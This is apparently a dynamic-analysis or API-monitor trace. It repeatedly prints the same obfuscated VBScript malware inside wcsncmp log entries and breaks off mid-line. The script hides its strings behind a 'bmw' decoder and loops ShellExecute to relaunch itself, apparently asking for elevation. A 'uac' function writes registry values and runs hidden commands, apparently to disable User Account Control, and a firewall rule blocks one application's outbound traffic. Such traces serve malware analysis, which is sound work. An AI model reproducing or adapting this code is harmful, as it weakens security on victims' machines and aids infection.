Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0226.366] wcsncmp (_String1="EN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.366] wcsncmp (_String1="N\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.366] wcsncmp (_String1="\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.366] wcsncmp (_String1="))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.366] wcsncmp (_String1=")\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 